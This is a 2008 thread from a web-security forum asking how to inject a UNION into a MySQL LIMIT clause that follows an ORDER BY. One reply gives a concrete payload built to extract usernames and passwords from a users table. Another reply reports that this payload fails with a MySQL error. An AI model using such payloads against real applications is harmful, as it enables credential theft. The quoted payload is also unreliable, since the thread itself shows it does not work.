Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
[MySQL] ORDER BY and UNION syntax problem
Posted by: EgiX
Date: February 03, 2008 07:31PM

hi guys! i've a question about a SQL injection into LIMIT statement in a query similar to this:

$SQL = "SELECT name FROM options ORDER BY name LIMIT $start, 25";

where i can handle $start...but if i try to inject an UNION statement by $start there is a problem with the ORDER BY and UNION syntax, MySQL manual say:

Quote

To use an ORDER BY or LIMIT clause to sort or limit the entire UNION result,
parenthesize the individual SELECT statements and place the ORDER BY or LIMIT after the last one.
The following example uses both clauses:

(SELECT a FROM t1 WHERE a=10 AND B=1)
UNION
(SELECT a FROM t2 WHERE a=11 AND B=2)
ORDER BY a LIMIT 10;

so, how can i inject syntaxly correct SQL code into $start parameter without any parentheses? it's possible?

thanks before!

EDIT: sorry, i've posted in the wrong section...can i delete my post?!



Edited 1 time(s). Last edit at 02/03/2008 07:35PM by EgiX.

Options: ReplyQuote
Re: [MySQL] ORDER BY and UNION syntax problem
Posted by: adamlang
Date: May 29, 2008 09:09AM

you just need to carry it on into the next sql statement

$start = "0,0 UNION select concat(username.':',password) from users LIMIT 0,";

which would make the whole query:

$SQL = "SELECT name FROM options ORDER BY name LIMIT 0,0 UNION select concat(username,':',password) from users LIMIT 0, 25";

this would force the first query to retrive 0 rows and then the second query would retrieve the first 25 usernames and passwords from the users database.

Options: ReplyQuote
Re: [MySQL] ORDER BY and UNION syntax problem
Posted by: Raz0r
Date: June 07, 2008 12:14PM

have you tried your query before posting? it doesn't work:
Quote

Incorrect usage of UNION and ORDER BY

http://Raz0r.name - a web-security blog ( in Russian )

Options: ReplyQuote
Re: [MySQL] ORDER BY and UNION syntax problem
Posted by: backbone
Date: June 09, 2008 06:38AM

http://dev.mysql.com/doc/refman/5.0/en/order-by-optimization.html

throw a find on "Henrik Grubbström" to have the anwser to the UNION, LIMIT, ORDER BY combination...

or just take a look at the following query...

(SELECT * FROM t1 FORCE INDEX (key1_key2_key3)
WHERE key1=1 ORDER BY key2,key3 LIMIT 10)
UNION
(SELECT * FROM t1 FORCE INDEX (key1_key2_key3)
WHERE key1=2 ORDER BY key2,key3 LIMIT 10)
ORDER BY key2,key3 LIMIT 5, 5

Options: ReplyQuote


Sorry, only registered users may post in this forum.